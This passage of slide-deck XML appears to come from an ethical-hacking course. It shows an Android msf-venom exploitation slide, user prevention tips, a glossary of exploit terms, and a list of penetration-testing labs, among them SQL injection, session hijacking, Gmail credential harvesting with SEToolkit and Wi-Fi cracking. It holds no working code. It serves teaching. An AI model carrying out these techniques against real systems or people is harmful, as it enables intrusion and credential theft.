              <a:spcBef>
                <a:spcPts val="4800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym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65"/>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lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Exploiting Android using msf-venom</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1836" name="Google Shape;1836;p265"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105900" y="898475"/>
            <a:ext cx="8726400" cy="2308200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Let’s quickly look at some tips which prevent these types of attack.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Don’t allow downloading any apps from cloud websites</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Don’t install apps with an unknown resources enabled option</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Use antivirus in a mobile device</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Don’t click any random links</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Never download an unwanted .doc, PDF or .apk file from unknown source</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-368300" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="212529"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Always confirm with the source of the file to be doubly sure</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="0" indent="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="4000"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym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p26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RECAP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1842" name="Google Shape;1842;p266"/>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rgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Exploit (noun): Malicious code to exploit a vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Exploit (verb): To carry out or use malicious code to exploit a vulnerability</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>LHOST: A local host where you need to get session after payload execution</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>LPORT: Local port where you want the session</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Payload: An activity to perform after successful exploit execution</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>RHOST: Remote host or target host</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="4000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1300">
                <a:solidFill>
                  <a:srgbClr val="212529"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>RPORT: Remote port or target port number</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="212529"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>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67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="172700" y="216750"/>
            <a:ext cx="8614800" cy="471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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>2. Performing Automated Network Reconnaissance Using Recon-ng</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3. Collecting Information from Social Networking Sites Using Recon-ng Pushpin</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4. Full Scan, Half Open Scan and Stealth scan, Xmas scan …. Using NMAP and store scanning results in different Format</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="A64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>5. Capture HTTP Packet and identify User Id and Password using Wireshark </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6. Perform vulnerability scanning using Nessus tool</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7. Creating and analyzing spoofed emails using emkei.cz, online tool</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8. Intercept Web Traffic using Burp proxy</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9. Demonstrate Web Traffic Poisoning using Burp Suite</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10. Use Website Template of Gmail to capture userid and Password using SEToolkit</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11. Perform Host DIscovery, Service Discovery, Port Scanning using Using Metasploit</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12. Enumerates MySQL Info and Enumerates Directories Used by Web Servers by using NMAP</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13. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</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14. Use Kali Linux on DVWA Cloud</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15.  Perform SQL injection attack using SQL Map in kaliLinux.</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16. Perform session hijacking using Zed Attack Proxy (ZAP).</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17. Exploiting vulnerabilities in android mobile operating system</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18. Perform wireless penetration testing using aircrack-ng.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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p268"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="25905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18</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1853" name="Google Shape;1853;p268"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="206400" y="1017725"/>
            <a:ext cx="8625900" cy="554100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-381000" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="424242"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Perform Wireless Penetration Testing using aircrack-ng.</a:t>
            </a:r>
            <a:endParaRPr sz="240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p26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spcBef>
                <a:spcPts val="210"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Wireless </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3300">
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>Scanning</a:t>
            </a:r>
            <a:endParaRPr sz="3300" b="1">
              <a:solidFill>
                <a:srgbClr val="353535"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="r" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1859" name="Google Shape;1859;p269"/>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42900" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D3D3D"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D3D3D"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The aircrack-ng site (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="F54337"/>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www.aircrack-ng.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
